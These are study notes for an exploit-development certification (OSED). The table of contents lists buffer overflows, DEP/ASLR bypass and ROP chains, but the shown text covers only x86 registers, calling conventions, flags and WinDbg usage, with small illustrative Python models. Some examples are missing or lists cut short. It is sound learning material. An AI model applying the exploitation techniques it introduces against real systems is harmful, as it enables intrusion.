OSED Notes Study Overview by Joas Antonio
https://www.linkedin.com/in/joas-antonio-dos-santos
Contents
OSED Notes by Joas Antonio and Alex
Laboratory
X86 Architecture
CPU Register
General Purpose Registers
eax
ebx
ecx
edx
esi
edi
ebp
esp
Special Purpose Registers
eip
flags
Introduction Windows Debugger
Windows Register
Controlling Execution with Windbg
Stack Based Buffer Overflow
Data Execution Prevention
Address Space Layout Randomization
Control Flow Guard
Stack Buffer Overflow - Jumping Shellcode
SEH Buffer Overflow
Finding Bad Characters
IDA Pro
Windows ASLR Bypass
Egg Hunters
Introduction to the Win32 Egghunter
SEH Buffer Overflow EggHunter
Shellcode
Shellcode Encode and Decode
Creating Shellcode Encoded
DEP Bypass
Overwriting EIP
ASLR Bypass
Return Oriented Programming
Rop Chain
Rop Decode
Reversing Engineering
Reverse Engineering with Immunity Debugger
Reverse Engineering with GDB
Assembly and C/C++ Courses
Study Material – OSED
Laboratory
https://github.com/CyberSecurityUP/Buffer-Overflow-Labs
https://github.com/firmianay/Life-long-Learner/blob/master/SEED-labs/buffer-overflow-vulnerability-lab.md
https://github.com/Jeffery-Liu/Buffer-Overflow-Vulnerability-Lab
https://github.com/tecnico-sec/Buffer-Overflow
https://github.com/epi052/osed-scripts
SLMail 5.5
X86 Architecture
What Does x86 Architecture Mean?
The x86 architecture is an instruction set architecture (ISA) series for computer processors.
Developed by Intel Corporation, x86 architecture defines how a processor handles and
executes different instructions passed from the operating system (OS) and software programs.
The “x” in x86 denotes ISA version.
Designed in 1978, x86 architecture was one of the first ISAs for microprocessor-based
computing. Key features include:
• Allows software programs and instructions to run on any processor in the Intel 8086 family
• Provides procedures for utilizing and managing the hardware components of a central
processing unit (CPU)
The x86 architecture primarily handles programmatic functions and provides services, such as
memory addressing, software and hardware interrupt handling, data type, registers and
input/output (I/O) management.
https://www.techopedia.com/definition/5334/x86-architecture
The Intel x86 processor uses complex instruction set computer (CISC) architecture, which
means there is a modest number of special-purpose registers instead of large quantities of
general-purpose registers. It also means that complex special-purpose instructions will
predominate.
The x86 processor traces its heritage at least as far back as the 8-bit Intel 8080 processor.
Many peculiarities in the x86 instruction set are due to the backward compatibility with that
processor (and with its Zilog Z-80 variant).
Microsoft Win32 uses the x86 processor in 32-bit flat mode. This documentation will focus only
on the flat mode.
Registers
eax Accumulator
edx Data register - can be used for I/O port access and arithmetic functions
All integer registers are 32 bit. However, many of them have 16-bit or 8-bit subregisters.
ah High 8 bits of ax
bh High 8 bits of bx
ch High 8 bits of cx
dh High 8 bits of dx
Operating on a subregister affects only the subregister and none of the parts outside the
subregister. For example, storing to the ax register leaves the high 16 bits of the eax register
unchanged.
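The subregister rule can be checked with a little bit masking. The following Python sketch is illustrative only: it models eax as a plain 32-bit integer, and the helper names write_ax, write_ah and write_al are invented for this example.

```python
def write_ax(eax, value):
    """Store a 16-bit value into ax; the high 16 bits of eax stay untouched."""
    return (eax & 0xFFFF0000) | (value & 0xFFFF)


def write_ah(eax, value):
    """Store an 8-bit value into ah (bits 8-15 of eax)."""
    return (eax & 0xFFFF00FF) | ((value & 0xFF) << 8)


def write_al(eax, value):
    """Store an 8-bit value into al (bits 0-7 of eax)."""
    return (eax & 0xFFFFFF00) | (value & 0xFF)


eax = 0x11223344
print(hex(write_ax(eax, 0xBEEF)))  # 0x1122beef
print(hex(write_ah(eax, 0xAA)))    # 0x1122aa44
print(hex(write_al(eax, 0x00)))    # 0x11223300
```

In each case only the bits belonging to the subregister change, which matches the behaviour described above.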
When using the ? (Evaluate Expression) command, registers should be prefixed with an "at"
sign ( @ ). For example, you should use ? @ax rather than ? ax. This ensures that the debugger
recognizes ax as a register rather than a symbol.
However, the (@) is not required in the r (Registers) command. For instance, r ax=5 will always
be interpreted correctly.
Two other registers are important for the processor's current state.
eip Instruction pointer
flags Flags
Calling Conventions
The x86 architecture has several different calling conventions. Fortunately, they all follow the
same register preservation and function return rules:
• Functions must preserve all registers, except for eax, ecx, and edx, which can be
changed across a function call, and esp, which must be updated according to the
calling convention.
• The eax register receives function return values if the result is 32 bits or smaller. If the
result is 64 bits, then the result is stored in the edx:eax pair.
• Win32 (__stdcall)
Function parameters are passed on the stack, pushed right to left, and the callee cleans the
stack.
• Native C++ method call (also known as thiscall)
Function parameters are passed on the stack, pushed right to left, the "this" pointer is passed
in the ecx register, and the callee cleans the stack.
• COM (__stdcall for C++ method calls)
Function parameters are passed on the stack, pushed right to left, then the "this" pointer is
pushed on the stack, and then the function is called. The callee cleans the stack.
• __fastcall
The first two DWORD-or-smaller arguments are passed in the ecx and edx registers. The
remaining parameters are passed on the stack, pushed right to left. The callee cleans the stack.
• __cdecl
Function parameters are passed on the stack, pushed right to left, and the caller cleans the
stack. The __cdecl calling convention is used for all functions with variable-length parameters.
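Two of the rules above lend themselves to a quick sketch: the right-to-left push order, and the edx:eax pair used for 64-bit return values. The Python below is only a model under those assumptions; push_order, split_edx_eax and join_edx_eax are hypothetical helper names, not part of any debugger or compiler.

```python
def push_order(args):
    """Return arguments in the order they are pushed: right to left."""
    return list(reversed(args))


def split_edx_eax(value):
    """Split a 64-bit return value into its (edx, eax) halves."""
    value &= 0xFFFFFFFFFFFFFFFF
    return (value >> 32) & 0xFFFFFFFF, value & 0xFFFFFFFF


def join_edx_eax(edx, eax):
    """Rebuild the 64-bit value a caller reads from the edx:eax pair."""
    return ((edx & 0xFFFFFFFF) << 32) | (eax & 0xFFFFFFFF)


# For a call f(a, b, c), c is pushed first and a last,
# so a ends up closest to the top of the stack.
print(push_order(["a", "b", "c"]))  # ['c', 'b', 'a']

edx, eax = split_edx_eax(0x1122334455667788)
print(hex(edx), hex(eax))           # 0x11223344 0x55667788
```

The high half travels in edx and the low half in eax, so a 32-bit result simply uses eax alone.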
In user-mode debugging, you can ignore the iopl and the entire last line of the debugger
display.
x86 Flags
In the preceding example, the two-letter codes at the end of the second line are flags. These
are single-bit registers and have a variety of uses.
tf Trap Flag: If tf equals 1, the processor will raise a STATUS_SINGLE_STEP exception after the
execution of one instruction. This flag is used by a debugger to implement single-step
tracing. It should not be used by other applications.
iopl I/O Privilege Level: This is a two-bit integer, with values between zero and 3. It is
used by the operating system to control access to hardware. It should not be used by
applications.
When registers are displayed as a result of some command in the Debugger Command
window, it is the flag status that is displayed. However, if you want to change a flag using the r
(Registers) command, you should refer to it by the flag code.
In the Registers window of WinDbg, the flag code is used to view or alter flags. The flag status
is not supported.
Here is an example. In the preceding register display, the flag status ng appears. This means
that the sign flag is currently set to 1. To change this, use the following command:
r sf=0
This sets the sign flag to zero. If you do another register display, the ng status code will not
appear. Instead, the pl status code will be displayed.
The Sign Flag, Zero Flag, and Carry Flag are the most commonly-used flags.
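The relationship between flag codes (such as sf) and flag statuses (such as ng and pl) can be sketched as a small decoder. This is an illustrative Python model, not debugger code: the bit positions are the standard EFLAGS layout, the status pairs beyond ng, pl and zr are taken from the usual WinDbg register display, and the function names flag_status and set_flag are invented here.

```python
# (flag code, EFLAGS bit, status shown when set, status shown when clear)
FLAGS = [
    ("of", 11, "ov", "nv"),
    ("df", 10, "dn", "up"),
    ("if", 9, "ei", "di"),
    ("sf", 7, "ng", "pl"),
    ("zf", 6, "zr", "nz"),
    ("af", 4, "ac", "na"),
    ("pf", 2, "pe", "po"),
    ("cf", 0, "cy", "nc"),
]


def flag_status(eflags):
    """Render an EFLAGS value as the two-letter status codes."""
    return " ".join(
        on if (eflags >> bit) & 1 else off for _, bit, on, off in FLAGS
    )


def set_flag(eflags, code, value):
    """Model 'r <code>=<value>' by setting or clearing one flag bit."""
    bit = next(b for c, b, _, _ in FLAGS if c == code)
    return eflags | (1 << bit) if value else eflags & ~(1 << bit)


eflags = 0x286
print(flag_status(eflags))                      # nv up ei ng nz na pe nc
print(flag_status(set_flag(eflags, "sf", 0)))   # nv up ei pl nz na pe nc
```

Clearing sf turns the ng status into pl while every other status stays the same, which mirrors the r sf=0 example.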
Conditions
A condition describes the state of one or more flags. All conditional operations on the x86 are
expressed in terms of conditions.
The assembler uses a one or two letter abbreviation to represent a condition. A condition can
be represented by multiple abbreviations. For example, AE ("above or equal") is the same
condition as NB ("not below"). The following table lists some common conditions and their
meaning.
C CF=1 Last operation required a carry or borrow. (For unsigned integers, this indicates overflow.)
NC CF=0 Last operation did not require a carry or borrow. (For unsigned integers, this indicates no overflow.)
O OF=1 When treated as a signed integer operation, the last operation caused an overflow or underflow.
NO OF=0 When treated as a signed integer operation, the last operation did not cause an overflow or
underflow.
Conditions can also be used to compare two values. The cmp instruction compares its two
operands, and then sets flags as if it had subtracted one operand from the other. The following
conditions can be used to check the result of cmp value1, value2.
LE NG ZF=1 or SF!=OF value1 <= value2. Values are treated as signed integers.
G NLE ZF=0 and SF=OF value1 > value2. Values are treated as signed integers.
L NGE SF!=OF value1 < value2. Values are treated as signed integers.
BE NA CF=1 or ZF=1 value1 <= value2. Values are treated as unsigned integers.
A NBE CF=0 and ZF=0 value1 > value2. Values are treated as unsigned integers.
B NAE CF=1 value1 < value2. Values are treated as unsigned integers.
Conditions are typically used to act on the result of a cmp or test instruction. For example,
cmp eax, 5
jz equal
compares the eax register against the number 5 by computing the expression (eax - 5) and
setting flags according to the result. If the result of the subtraction is zero, then the zr flag will
be set, and the jz condition will be true so the jump will be taken.
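To see how the condition codes fall out of a comparison, the following Python sketch models cmp as a 32-bit subtraction and evaluates a few of the conditions listed earlier. It is a simplified model under stated assumptions: only ZF, SF, CF and OF are computed, and cmp_flags and CONDITIONS are names invented for this example.

```python
def cmp_flags(value1, value2, bits=32):
    """Compute ZF, SF, CF and OF as cmp value1, value2 would set them."""
    mask = (1 << bits) - 1
    sign = 1 << (bits - 1)
    a, b = value1 & mask, value2 & mask
    result = (a - b) & mask
    return {
        "ZF": int(result == 0),
        "SF": int(bool(result & sign)),
        "CF": int(a < b),  # a borrow was needed (unsigned view)
        # Signed overflow: operand signs differ and the result's sign
        # differs from the sign of the first operand.
        "OF": int(bool((a ^ b) & (a ^ result) & sign)),
    }


CONDITIONS = {
    "Z": lambda f: f["ZF"] == 1,
    "LE": lambda f: f["ZF"] == 1 or f["SF"] != f["OF"],
    "G": lambda f: f["ZF"] == 0 and f["SF"] == f["OF"],
    "L": lambda f: f["SF"] != f["OF"],
    "BE": lambda f: f["CF"] == 1 or f["ZF"] == 1,
    "A": lambda f: f["CF"] == 0 and f["ZF"] == 0,
    "B": lambda f: f["CF"] == 1,
}

# cmp eax, 5 with eax = 5: the subtraction yields zero, so jz is taken.
print(CONDITIONS["Z"](cmp_flags(5, 5)))            # True

# 0xFFFFFFFF is -1 when signed but the largest value when unsigned.
flags = cmp_flags(0xFFFFFFFF, 1)
print(CONDITIONS["L"](flags), CONDITIONS["A"](flags))  # True True
```

The last line shows why signed and unsigned conditions are kept separate: the same bit pattern is both "less than" and "above" depending on interpretation.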
Data Types
• byte: 8 bits
• word: 16 bits
• dword: 32 bits
Notation
The following table indicates the notation used to describe assembly language instructions.
Notation Meaning
m Memory address (see the succeeding Addressing Modes section for more information.)
#n Immediate constant
Addressing Modes
There are several different addressing modes, but they all take the form T ptr [expr],
where T is some data type (see the preceding Data Types section) and expr is some expression
involving constants and registers.
The notation for most modes can be deduced without much difficulty. For example, BYTE PTR
[esi+edx*8+3] means "take the value of the esi register, add to it eight times the value of
the edx register, add three, then access the byte at the resulting address."
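The address arithmetic in that example can be worked through in a few lines of Python. This is a minimal sketch, assuming a flat byte array stands in for memory; effective_address, read_byte_ptr and read_dword_ptr are hypothetical helpers, and the register values are arbitrary.

```python
def effective_address(base, index, scale, displacement):
    """Compute base + index*scale + displacement, wrapped to 32 bits."""
    if scale not in (1, 2, 4, 8):
        raise ValueError("x86 scale factor must be 1, 2, 4 or 8")
    return (base + index * scale + displacement) & 0xFFFFFFFF


def read_byte_ptr(memory, address):
    """Model BYTE PTR [address]."""
    return memory[address]


def read_dword_ptr(memory, address):
    """Model DWORD PTR [address]; x86 stores integers little-endian."""
    return int.from_bytes(memory[address:address + 4], "little")


memory = bytearray(range(256))  # toy memory: byte at address N holds N
esi, edx = 0x10, 0x02

address = effective_address(esi, edx, 8, 3)  # 0x10 + 2*8 + 3
print(hex(address))                          # 0x23
print(hex(read_byte_ptr(memory, address)))   # 0x23
print(hex(read_dword_ptr(memory, address)))  # 0x26252423
```

The same expression with a different T only changes how many bytes are read at the computed address.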
Pipelining
The Pentium is dual-issue, which means that it can perform up to two actions in one clock tick.
However, the rules on when it is capable of doing two actions at once (known as pairing) are
very complicated.
Because x86 is a CISC processor, you do not have to worry about jump delay slots.
Load, modify, and store instructions can receive a lock prefix, which modifies the instruction as
follows:
1. Before issuing the instruction, the CPU will flush all pending memory operations to
ensure coherency. All data prefetches are abandoned.
2. While issuing the instruction, the CPU will have exclusive access to the bus. This
ensures the atomicity of the load/modify/store operation.
The xchg instruction automatically obeys the previous rules whenever it exchanges a value
with memory.
Jump Prediction
Conditional jumps are predicted to be taken or not taken, depending on whether they were
taken the last time they were executed. The cache for recording jump history is limited in size.
If the CPU does not have a record of whether the conditional jump was taken or not taken the
last time it was executed, it predicts backward conditional jumps as taken and forward
conditional jumps as not taken.
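The prediction rule described above can be sketched as a tiny history table with a static fallback. This Python model is an assumption-laden illustration: the source only says the history cache is limited in size, so the capacity and the oldest-entry eviction used here are invented, as is the BranchPredictor class itself.

```python
from collections import OrderedDict


class BranchPredictor:
    """Toy predictor: last outcome if known, else a static guess."""

    def __init__(self, capacity=4):
        self.capacity = capacity      # assumed size limit of the history
        self.history = OrderedDict()  # branch address -> last outcome

    def predict(self, branch_addr, target_addr):
        if branch_addr in self.history:
            return self.history[branch_addr]
        # No record: backward jumps (typically loops) are predicted taken,
        # forward jumps are predicted not taken.
        return target_addr < branch_addr

    def record(self, branch_addr, taken):
        self.history[branch_addr] = taken
        self.history.move_to_end(branch_addr)
        if len(self.history) > self.capacity:
            self.history.popitem(last=False)  # assumed eviction policy


predictor = BranchPredictor()
print(predictor.predict(0x1000, 0x0F00))  # backward, no history: True
print(predictor.predict(0x1000, 0x1100))  # forward, no history: False
predictor.record(0x1000, True)
print(predictor.predict(0x1000, 0x1100))  # history wins: True
```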
Alignment
The x86 processor will automatically correct unaligned memory access, at a performance
penalty. No exception is raised.
A memory access is considered aligned if the address is an integer multiple of the object size.
For example, all BYTE accesses are aligned (everything is an integer multiple of 1), WORD
accesses to even addresses are aligned, and DWORD addresses must be a multiple of 4 in
order to be aligned.
The lock prefix should not be used for unaligned memory accesses.
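The alignment definition above reduces to a single modulo test. A minimal Python sketch, with the helper name is_aligned and the SIZES table chosen only for this example:

```python
# Object sizes in bytes for the data types used in this section.
SIZES = {"BYTE": 1, "WORD": 2, "DWORD": 4}


def is_aligned(address, data_type):
    """An access is aligned if the address is a multiple of the object size."""
    return address % SIZES[data_type] == 0


for address in (0x1000, 0x1002, 0x1003):
    print(hex(address), {t: is_aligned(address, t) for t in SIZES})
```

Only 0x1000 is aligned for all three types; 0x1002 is aligned for BYTE and WORD, and 0x1003 for BYTE alone.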
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/x86-architecture
https://opensecuritytraining.info/IntermediateX86.html
https://www.youtube.com/watch?v=OJxHs-DSQkc
CPU Register
In computer architecture, registers are very fast memory inside the CPU, used to execute
programs and operations efficiently. They do this by giving immediate access to commonly used
values, i.e., the values being operated on at that moment. For this purpose, there are several
classes of CPU registers, which work in coordination with main memory to run operations
efficiently.
The sole purpose of a register is fast retrieval of data for processing by the CPU. Although
fetching instructions from RAM is faster than fetching them from a hard drive, it is still not
fast enough for the CPU. For better performance, the CPU contains its own memory, which can
load from RAM the data that is about to be processed. After registers comes cache memory,
which is fast but slower than registers.
• Accumulator:
This is the most frequently used register, used to store data taken from memory. The number
of accumulators varies between microprocessors.
So, these are the different registers, each operating for a specific purpose.
https://www.geeksforgeeks.org/different-classes-of-cpu-registers/
These registers play a critical role in CPU processing. Input is stored in registers, processed
there, and the output is read back from registers.
• Fetch: Fetch the user's instructions, along with the instructions held in main memory, in
sequence.
• Decode: Decode the instructions to be performed, so that the CPU knows what each
instruction is.
• Execute: Once the instructions are decoded, the CPU executes them. When done, the
result is presented on the user's screen.
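The fetch, decode and execute steps can be sketched as a loop over a toy program. This Python model is purely illustrative: the three-instruction machine (LOAD, ADD, HALT), the single accumulator and the run function are all invented for the example and do not correspond to x86.

```python
def run(program):
    """Run a toy program and return the accumulator at HALT."""
    accumulator = 0
    program_counter = 0
    while True:
        # Fetch: read the instruction the program counter points at,
        # then advance the counter to the next instruction.
        instruction = program[program_counter]
        program_counter += 1

        # Decode: split the instruction into opcode and operand.
        opcode, operand = instruction

        # Execute: perform the operation on the accumulator.
        if opcode == "LOAD":
            accumulator = operand
        elif opcode == "ADD":
            accumulator += operand
        elif opcode == "HALT":
            return accumulator
        else:
            raise ValueError("unknown opcode: %r" % (opcode,))


program = [("LOAD", 2), ("ADD", 40), ("HALT", None)]
print(run(program))  # 42
```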
• Accumulator (AC)
• Flag Register
These registers are an integral part of the computer, and each has a specific purpose. Let us
look at them below.
1. Accumulator
The accumulator register is part of the ALU (Arithmetic Logic Unit), which, as the name
suggests, is responsible for performing arithmetic and logical operations. The control unit
stores the data values fetched from main memory in the accumulator for arithmetic or logical
operations. This register holds the initial data, the intermediate results, and the final
result of an instruction. The final result of the operation, arithmetic or logical, is
transferred to main memory through the MBR.
2. Flag Register
This special register checks for the occurrence of various conditions in the CPU. Its size is
one or two bytes, since it holds only flag information. It mainly comes into play when a
condition is being evaluated.
3. Data Register
This register is used to temporarily store the data being transmitted from the other involved
peripheral devices.
4. Address register
The address register, also called the memory address register (MAR), is a memory unit that
stores the address of data or instructions in main memory. It may contain a portion of
the address, which can be used to compute the complete address.
5. Program Counter
This register is also known popularly as an instruction pointer register. This register as the
name suggests will be holding the address of the next instruction that needs to be fetched and
executed or performed. When the instruction is fetched then the value is incremented and
hence will always be holding the address of the next instruction to be run.
6. Instruction Register
Once the instruction is fetched from main memory, it is stored in the Instruction Register (IR).
The control unit takes the instruction from here, decodes it, and executes it by sending the
required signals to the required components.
7. Stack Control Register
The word stack in the name of this register refers to a set of memory blocks in which data is
stored and from which it is fetched. Storage and retrieval follow FILO (First In, Last Out)
order.
8. Memory Buffer Register
This register holds the information or data that is read from or written to memory.
Instructions stored in this register are transferred to the Instruction Register (IR),
whereas data is transferred to the accumulator or an I/O register.
9. Index Register
The index register is an integral part of the CPU that helps modify the address of a memory
operand during program execution. The contents of the index register are added to the
immediate address to obtain the effective address of data or an instruction in memory.
CPU registers are essential for fast execution of instructions; without them, CPU operation
is unimaginable. They are the fastest memory and hold the top position in the memory
hierarchy. A register can hold an instruction, an address, or any other sort of data. There
are different types of registers, and the most used ones are covered above. Registers make
CPU operations smooth, efficient, and meaningful. A register must be large enough for its
requirements and specifications.
Advantages
• Registers are the fastest memory blocks, so instructions execute faster than they would
from main memory
• Since each register has a distinct purpose, the CPU can handle instructions smoothly with
their help
• There is hardly any CPU in the digital world that does not have registers
Disadvantages
Let us take a look at the disadvantages:
• Since the size of a register is finite, if an instruction is larger the CPU needs to use
cache or main memory along with the register for the operation
https://www.educba.com/what-is-cpu-register/
Some registers are typically volatile across functions, and others remain unchanged. This is a
feature of the compiler's conventions and must be handled in the code: registers are not
preserved automatically (although in some assembly languages they are -- but not in x86).
What that means is, when a function is called, there is no guarantee that volatile registers will
retain their value when the function returns, and it's the function's responsibility to preserve
non-volatile registers.
eax
eax is a 32-bit general-purpose register with two common uses: to store the return value of
a function and as a special register for certain calculations. It is technically a volatile
register, since the value isn't preserved. Instead, its value is set to the return value of a
function before a function returns. Other than esp, this is probably the most important
register to remember for this reason. eax is also used specifically in certain calculations,
such as multiplication and division, as a special register. That use will be examined in the
instructions section.
Here is an example of a function returning in C:
ebx
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a
commonly used value (such as 0) throughout a function to speed up calculations.
ecx
ecx is a volatile general-purpose register that is occasionally used as a function parameter
or as a loop counter.
Functions of the "__fastcall" convention pass the first two parameters to a function using
ecx and edx. Additionally, when calling a member function of a class, a pointer to that class
is often passed in ecx no matter what the calling convention is.
Additionally, ecx is often used as a loop counter. for loops generally, although not always,
set the accumulator variable to ecx. rep- instructions also use ecx as a counter,
automatically decrementing it till it reaches 0. This class of instruction will be discussed in a
later section.
edx
edx is a volatile general-purpose register that is occasionally used as a function parameter.
Like ecx, edx is used for "__fastcall" functions.
Besides fastcall, edx is generally used for storing short-term variables within a function.
esi
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for
"rep-" class instructions, which require a source and a destination for data, esi points to the
"source". esi often stores data that is used throughout a function because it doesn't change.
edi
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to
esi, except that it is generally used as a destination for data.
ebp
ebp is a non-volatile general-purpose register that has two distinct uses depending on
compile settings: it is either the frame pointer or a general purpose register.
If compilation is not optimized, or code is written by hand, ebp keeps track of where the
stack is at the beginning of a function (the stack will be explained in great detail in a later
section). Because the stack changes throughout a function, having ebp set to the original
value allows variables stored on the stack to be referenced easily. This will be explored in
detail when the stack is explained.
If compilation is optimized, ebp is used as a general register for storing any kind of data,
while calculations for the stack pointer are done based on the stack pointer moving (which
gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)
esp
esp is a special register that stores a pointer to the top of the stack (the top is actually at a
lower virtual address than the bottom as the stack grows downwards in memory towards
the heap). Math is rarely done directly on esp, and the value of esp must be the same at
the beginning and the end of each function. esp will be examined in much greater detail in
a later section.
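The way esp moves can be sketched with a small model of push and pop. This is an illustrative Python sketch only: the Stack32 class, its starting address and its size are arbitrary assumptions, chosen to show that a push lowers esp by four bytes and a pop raises it again.

```python
class Stack32:
    """Toy 32-bit stack that grows toward lower addresses."""

    def __init__(self, base=0x0012FF00, size=0x100):
        self.base = base           # address just above the stack region
        self.low = base - size     # lowest usable address
        self.memory = bytearray(size)
        self.esp = base            # empty stack: esp sits at the base

    def push(self, value):
        if self.esp - 4 < self.low:
            raise OverflowError("stack region exhausted")
        self.esp -= 4              # the top moves to a lower address
        offset = self.esp - self.low
        self.memory[offset:offset + 4] = (value & 0xFFFFFFFF).to_bytes(4, "little")

    def pop(self):
        if self.esp >= self.base:
            raise IndexError("pop from empty stack")
        offset = self.esp - self.low
        value = int.from_bytes(self.memory[offset:offset + 4], "little")
        self.esp += 4              # the top moves back up
        return value


stack = Stack32()
start = stack.esp
stack.push(0x41414141)
stack.push(0x42424242)
print(hex(start - stack.esp))      # 0x8
print(hex(stack.pop()))            # 0x42424242 (last in, first out)
print(hex(stack.pop()))            # 0x41414141
print(stack.esp == start)          # True
```

After matching pushes and pops esp returns to its starting value, which is the balance a function is expected to maintain between entry and exit.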
eip
eip, or the instruction pointer, is a special-purpose register which stores a pointer to the
address of the instruction that is currently executing. Making a jump is like adding to or
subtracting from the instruction pointer.
After each instruction, a value equal to the size of the instruction is added to eip, which
means that eip points at the machine code for the next instruction. This simple example
shows the automatic addition to eip at every step:
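As a stand-in illustration of that addition, the following Python sketch walks a short, hand-assembled x86 sequence and adds each instruction's length to eip. The start address 0x00401000, the sample bytes and the trace_eip helper are assumptions made for this example; it only models sequential fall-through, not the jump that ret actually performs.

```python
# Hand-assembled 32-bit code: a common function prologue plus a return.
CODE = bytes.fromhex("558BEC83EC08B801000000C3")

# (mnemonic, encoded length in bytes) for each instruction in CODE.
INSTRUCTIONS = [
    ("push ebp", 1),      # 55
    ("mov ebp, esp", 2),  # 8B EC
    ("sub esp, 8", 3),    # 83 EC 08
    ("mov eax, 1", 5),    # B8 01 00 00 00
    ("ret", 1),           # C3
]


def trace_eip(start, instructions):
    """Return [(eip, mnemonic), ...] and the next sequential eip."""
    eip = start
    trace = []
    for mnemonic, length in instructions:
        trace.append((eip, mnemonic))
        eip += length  # eip advances by the size of the instruction
    return trace, eip


trace, next_eip = trace_eip(0x00401000, INSTRUCTIONS)
for eip, mnemonic in trace:
    print("%08x  %s" % (eip, mnemonic))
```

The printed addresses are 00401000, 00401001, 00401003, 00401006 and 0040100b: each step differs from the previous one by exactly the length of the instruction just executed.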
flags
In the flags register, each bit has a specific meaning and they are used to store meta-
information about the results of previous operations. For example, whether the last
calculation overflowed the register or whether the operands were equal. Our interest in the
flags register is usually around the cmp and test operations which will commonly set or
unset the zero, carry and overflow flags. These flags will then be tested by a conditional
jump which may be controlling program flow or a loop.
https://wiki.skullsecurity.org/index.php/Registers
Time Travel Debugging (TTD) is a tool that allows you to record an execution of your process,
then replay it later both forwards and backwards. TTD can help you debug issues more easily
by letting you "rewind" your debugger session, instead of having to reproduce the issue until
you find the bug.
TTD allows you to go back in time to better understand the conditions that lead up to the bug
and replay it multiple times to learn how best to fix the problem.
TTD can have advantages over crash dump files, which often are missing the code execution
that led up to the ultimate failure.
In the event you can't figure out the issue yourself, you can share the trace with a co-worker
and they can look at exactly what you're looking at. This can allow for easier collaboration than
live debugging, as the recorded instructions are the same, where the address locations and
code execution will be different on different PCs. You can also share a specific point in time to
help your co-worker figure out where to start.
TTD is efficient and works to add as little overhead as possible as it captures code execution in
trace files.
TTD includes a set of debugger data model objects to allow you to query the trace using LINQ.
For example, you can use TTD objects to locate when a specific code module was loaded or
locate all of the exceptions.
This table summarizes the pros and cons of the different debugging solutions available.
Approach: Live debugging
Pros: Interactive experience, sees flow of execution, can change target state, familiar tool in
familiar setting.
Cons: Disrupts the user experience, may require effort to reproduce the issue repeatedly, may
impact security, not always an option on production systems. With repro, difficult to work back
from point of failure to determine cause.
Approach: Dumps
Pros: No coding upfront, low-intrusiveness, based on triggers.
Cons: Successive snapshot or live dumps provide a simple “over time” view. Overhead is
essentially zero if not used.
Approach: Telemetry & logs
Pros: Lightweight, often tied to business scenarios / user actions, machine learning friendly.
Cons: Issues arise in unexpected code paths (with no telemetry). Lack of data depth, statically
compiled into the code.
Approach: Time Travel Debugging (TTD)
Pros: Great at complex bugs, no coding upfront, offline repeatable
Cons: Large overhead at record time. May collect more data than is needed. Data files can
become large.
TTD Availability
TTD is available on Windows 10 after installing the WinDbg Preview app from the Store.
WinDbg Preview is an improved version of WinDbg with more modern visuals, faster windows,
a full-fledged scripting experience, with built in support for the extensible debugger data
model. For more information on downloading WinDbg Preview from the store, see Debugging
Using WinDbg Preview.
To use TTD, you need to run the debugger elevated. Install WinDbg Preview using an account
that has administrator privileges and use that account when recording in the debugger. In
order to run the debugger elevated, select and hold (or right-click) the WinDbg Preview icon in
the Start menu and then select More > Run as Administrator.
https://docs.microsoft.com/en-gb/windows-hardware/drivers/debugger/time-travel-debugging-overview
https://docs.microsoft.com/pt-br/windows-hardware/drivers/debugger/debugger-download-tools
https://developer.microsoft.com/en-us/windows/hardware/download-windbg
Disassembly Window
To open or switch to the Disassembly window, in the WinDbg window, on the View menu,
click Disassembly. (You can also press ALT+7 or click the Disassembly (Alt+7) button on
the toolbar. ALT+SHIFT+7 will close the Disassembly Window.)
• To disassemble a different section of memory, in the Offset box, type the address of
the memory you want to disassemble. (You can press ENTER after typing the address,
but you do not have to.) The Disassembly window displays code before you have
completed the address; you can disregard this code.
• To see other sections of memory, click the Previous or Next button or press the
PAGE UP or PAGE DOWN keys. These commands display disassembled code from the
preceding or following sections of memory, respectively. By pressing the RIGHT
ARROW, LEFT ARROW, UP ARROW, and DOWN ARROW keys, you can navigate within
the window. If you use these keys to move off of the page, a new page will appear.
• If you want to disassemble a section of memory that does not contain machine
instructions, the debugger displays error messages.
• The line that represents the current program counter is highlighted in green, unless
you select a line with the mouse or by using one of the Edit | Go to Xxx commands. If
you select a line with the mouse or an Edit | Go to Xxx command, the selected line is
green and the line that represents the current program counter is not highlighted.
The Disassembly window has a toolbar that contains two buttons and a shortcut menu with
additional commands. To access the menu, right-click the title bar or click the icon that
appears near the upper-right corner of the window. The toolbar and menu contain the
following commands:
• (Toolbar only) The Offset box enables you to specify a new address for disassembly.
• (Toolbar and menu) Previous (on the toolbar) and Previous page (on the shortcut
menu) cause the debugger to disassemble and display the instructions immediately
prior to the current display.
• (Toolbar and menu) Next (on the toolbar) and Next page (on the shortcut menu) cause
the debugger to disassemble and display the instructions immediately after the
current display.
• (Menu only) Go to current address opens the Source window with the source file that
corresponds to the selected line in the Disassembly window and highlights this line.
• (Menu only) Disassemble before current instruction causes the current line to be
placed in the middle of the Disassembly window. This command is the default option.
If this command is cleared the current line will appear at the top of the Disassembly
window, which saves time because reverse-direction disassembly can be time-
consuming.
• (Menu only) Highlight instructions from the current source line causes all of the
instructions that correspond to the current source line to be highlighted. Often, a
single source line will correspond to multiple assembly instructions. If code has been
optimized, these assembly instructions might not be consecutive. This command
enables you to find all of the instructions that were assembled from the current source
line.
• (Menu only) Show source line for each instruction displays the source line number
that corresponds to each assembly instruction.
• (Menu only) Show source file for each instruction displays the source file name that
corresponds to each assembly instruction.
• (Menu only) Dock or Undock causes the window to enter or leave the docked state.
• (Menu only) Move to new dock closes the Disassembly window and opens it in a new
dock.
• (Menu only) Set as tab-dock target for window type is unavailable for the Disassembly
window. This option is only available for Source or Memory windows.
• (Menu only) Always floating causes the window to remain undocked even if it is
dragged to a docking location.
• (Menu only) Move with frame causes the window to move when the WinDbg frame is
moved, even if the window is undocked. For more information about docked, tabbed,
and floating windows, see Positioning the Windows.
• (Menu only) Help opens this topic in the Debugging Tools for Windows
documentation.
• (Menu only) Close closes this window.
http://www.dbgtech.net/windbghelp/hh/debugger/r36_gui_1_f9c06d65-64ae-4439-bb41-318a12e6c859.xml.htm
You can view memory by entering one of the Display Memory commands in the Debugger
Command window. You can edit memory by entering one of the Enter Values commands in
the Debugger Command window. For more information, see Accessing Memory by Virtual
Address and Accessing Memory by Physical Address.
To open a Memory window, choose Memory from the View menu. (You can also press ALT+5
or select the Memory button on the toolbar. ALT+SHIFT+5 closes the active Memory
window.)
